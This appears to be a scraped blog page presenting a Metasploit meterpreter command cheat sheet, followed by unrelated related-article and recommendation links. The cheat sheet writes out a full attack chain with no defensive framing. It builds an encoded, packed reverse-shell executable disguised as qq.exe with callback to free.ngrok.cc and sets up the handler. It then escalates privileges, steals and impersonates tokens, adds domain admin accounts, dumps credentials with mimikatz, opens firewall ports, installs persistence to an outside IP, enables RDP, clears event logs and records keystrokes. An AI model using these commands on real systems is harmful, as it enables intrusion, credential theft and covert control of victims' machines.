meterpreter Command Sample

==================================================================================================

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f c

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i  -b '\x00' LHOST=free.ngrok.cc LPORT= -f exe -o qq.exe

upx - qq.exe -k

==================================================================================================

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.195.45

set lport

set ExitOnSession false

set AutorunScript post/windows/manage/smart_migrate

exploit -j -z

jobs

sessions -i

sysinfo

screenshot

getuid

getsystem

getuid

run post/windows/manage/priv_migrate

background

ps

steal_token PID

drop_token

getuid

use incognito

help incognito

list_tokens -u

list_tokens -g

impersonate_token DOMAIN_NAME\USERNAME

add_user domainuser password -h 192.168.195.191

add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump

# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz

help mimikatz

msv

ssp

kerberos

wdigest

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/checkvm

run post/windows/gather/enum_applications

run post/windows/gather/dumplinks

run post/windows/gather/usb_history

run post/windows/gather/enum_devices

execute -f cmd.exe -i -H -t

net user username userpass /add

net localgroup "Administrators" username /add

net user domainuser userpass /add /DOMAIN

net group "Domain Admins" domainuser /add /DOMAIN

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

netsh firewall add portopening TCP  "Notepad" ENABLE ALL

exit

run metsvc

run persistence -X -i  -p  -r 47.90.92.56

run post/windows/manage/enable_rdp

run getgui -e

run getgui -u username -p userpass

# rdesktop -u username -p userpass server[:port]

clearev

run post/windows/capture/keylog_recorder

==================================================================================================

meterpreter Command Sample的更多相关文章

  1. POJ-1028 Web Navigation 和TOJ 1196. Web Navigation

    Standard web browsers contain features to move backward and forward among the pages recently visited ...

  2. 北大poj- 1028

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 33281   Accepted: 14836 ...

  3. POJ 1028题目描述

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  4. hdu 1509 Windows Message Queue

    题目连接 http://acm.hdu.edu.cn/showproblem.php?pid=1509 Windows Message Queue Description Message queue ...

  5. 小学生玩ACM----优先队列

    思来想去,本人还是觉得,这个优先队列啊,不学不行,怎么说咧?虽说有时候我可以模仿它的功能,但是有的题目会坑的我大放血,况且多学会用一个小东东总不会伤身的撒,何况我是永举不垂的,哦耶,嘿嘿 优先队列嘛就 ...

  6. Web Navigation

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  7. hdoj 1509 Windows Message Queue【优先队列】

    Windows Message Queue Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Ot ...

  8. SOSEx ReadMe

    Quick Ref:--------------------------------------------------bhi [filename] BuildHeapIndex - Builds a ...

  9. POJ-1028(字符串模拟)

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 31906   Accepted: 14242 ...

随机推荐

  1. 12JSP进阶

    1.EL表达式 1.1 简介 EL表达式替代jsp表达式.因为开发jsp页面的时候遵守原则:在jsp页面中尽量少些甚至不写java代码. EL表达式作用:向浏览器输出域对象中的变量或表达式计算的结果 ...

  2. Oracle package demo 包

    1.package 程序包说明(由函数.过程.变量.常量.游标和异常组成) create or replace package pk_test is -- Author : CHEN -- Creat ...

  3. springboot通过继承OncePerRequestFilter,在拦截器中@Autowired 为null问题

    springboot2版本以上环境 通过继承OncePerRequestFilter类,在重写doFilterInternal方法实现拦截的具体业务逻辑, 在实现的过程中,需要注入service方法, ...

  4. js中(try catch) 对代码的性能影响

    https://blog.csdn.net/shmnh/article/details/52445186 起因 要捕获 JavaScript 代码中的异常一般会采用 try catch,不过 try ...

  5. 【leetcode】885. Boats to Save People

    题目如下: 解题思路:本题可以采用贪心算法,因为每条船最多只能坐两人,所以在选定其中一人的情况下,再选择第二个人使得两人的体重最接近limit.考虑到人的总数最大是50000,而每个人的体重最大是30 ...

  6. @ControllerAdvice全局数据预处理

    在传统项目的Controller的方法中传入参数,对象中的属性相同时,会出现以下错误         Book类和Author类     这是因为两个对象中的name相同,传参时分不清西游记和六小龄童 ...

  7. 关于Reporting Services网站

    1.http://www.c-sharpcorner.com/search/sql%20server%20reporting%20services 2.https://msdn.microsoft.c ...

  8. docker运行spring boot 包镜像出现no main manifest attribute问题

    问题: 在进行docker部署的时候,开始对项目进行打包,在启动该镜像时 [root@topcheer docker]# docker run -it 00494e3d4550no main mani ...

  9. sqlserver常用命令-4

    原文: https://www.cnblogs.com/yunspider/p/7719714.html 常用命令 #查看数据库所有表的行数 SELECT A.NAME ,B.ROWS FROM sy ...

  10. 纯CSS实现项目展示遮罩详情效果

    本实例主要用于项目展示时鼠标hover后显示一个遮罩显示项目详情的效果,遮罩采用CSS的绝对定位以及CSS3盒子模型. 本实例应用广泛,很多品牌官方网站均有采用. hover: <!DOCTYP ...